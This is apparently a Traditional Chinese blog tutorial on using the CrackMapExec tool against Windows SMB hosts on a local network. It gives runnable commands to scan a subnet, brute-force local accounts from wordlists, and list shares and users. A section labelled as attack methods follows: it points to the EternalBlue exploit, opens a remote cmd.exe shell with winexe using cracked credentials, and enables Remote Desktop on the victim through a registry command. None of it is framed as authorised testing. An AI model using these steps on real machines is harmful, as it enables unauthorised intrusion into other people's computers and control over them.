CrackMapExec(又名CME) 這套軟體可以對網路芳鄰做很多事情，軟體教學可以看她的教學wiki

這軟體可以在mac或是linux、windows上使用。

windows上使用很簡單，他免安裝的 直接到https://github.com/Porchetta-Industries/CrackMapExec/releases 去下載最新版的windows壓縮檔即可

像是目前最新版是cme-windows-latest-3.10.zip 下載下來解壓縮你只會看到一個cme的檔案，他是會要用python來執行他，所以你的電腦需要先安裝好python

而如果你是用kali linux的話 應該是內建有了，沒有就apt-get install crackmapexec即可。如果是parrot os的話我不知道為啥怎實驗都失敗…

這邊要注意的一個分別是，在kali上，指令就直接下crackmapexec xxxx而在windows上會是要改成python cme xxxx 可以看下面範例，再來就看你要做甚麼可以看教學文件了，下面是幾個範例

列舉區網路上的smb電腦，如192.168.2.0網段

python cme smb 192.168.2.0/24
#在kali 上會改成下面這樣
crackmapexec smb 192.168.2.0/24

如上圖你就可以看到有三台電腦，且有的還有開smb 1，因為windows cmd沒支援顏色的關係 所以畫面就會很醜，有一堆色碼代號 排版也不漂亮，但是也是可以看就是，如果你不喜歡 可以去下載ConEmu 這套軟體，他有免安裝的。算是漂亮版的cmd就是

字典檔破解帳密

你可以透過下面指令來透過字典檔方式來破解密碼，首先你要準備好你的字典檔user.txt跟pass.txt

python cme smb 192.168.2.10 -u user.txt -p pass.txt --local-auth
#或是知道帳號了就直接打帳號
python cme smb 192.168.2.10 -u davidou -p pass.txt --local-auth

你輸入完就會看到他開始一值跑測試，最後如果停下來有顯示pwn3d!就代表猜到帳號密碼了，如下圖範例。猜到的帳號是davidou 密碼是adminadmin

列出網芳目錄

python cme smb 192.168.2.10 -u davidou -p pa$$word--shares

列出使用者(不一定成功，我在windows10列不出來，不過synology NAS可以

python cme smb 192.168.2.10 -u davidou -p pa$$word  --local-auth  --users

其餘可以參考這個影片教學 Comprehensive guide on using CrackMapExec

SMB 命令參考

既然破解了網芳代表對方一定有開smb功能，如果對方電腦是win7且防火牆沒有開的話，你就可以嘗試下面3種攻擊方式

• 使用永恆之藍ms17_010_eternalblue這個漏洞來拿到對方電腦權限
• 使用winexe來攻擊
• 幫對方開啟遠端桌面功能(反正你已經有帳號密碼了)

[攻擊方式1] 永恆之藍漏洞

請直接參閱另一篇文章 [資安] 永恆之藍ETERNALBLUE-MS17-010漏洞攻擊

[攻擊方式2]winexe 攻擊方法

winexe 攻擊方式如下 -U 後面接帳號%密碼 //對方IP 要執行的軟體

winexe –U 'Username%Password' //IP cmd.exe

[攻擊方式3]開啟遠端桌面攻擊

你透過winexe進到對方系統拿到cmd.exe權限後，可以直接幫他執行下面指令，來開啟遠端桌面RDP的功能

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

執行完畢後，你就可以直接透過遠端桌面連進去操作了，對於有些不太會下指令或是想要開某些軟體沒辦法指令操作的就很方便。不過遠端桌面過去有個很大的缺點就是對方一定會發現就是XD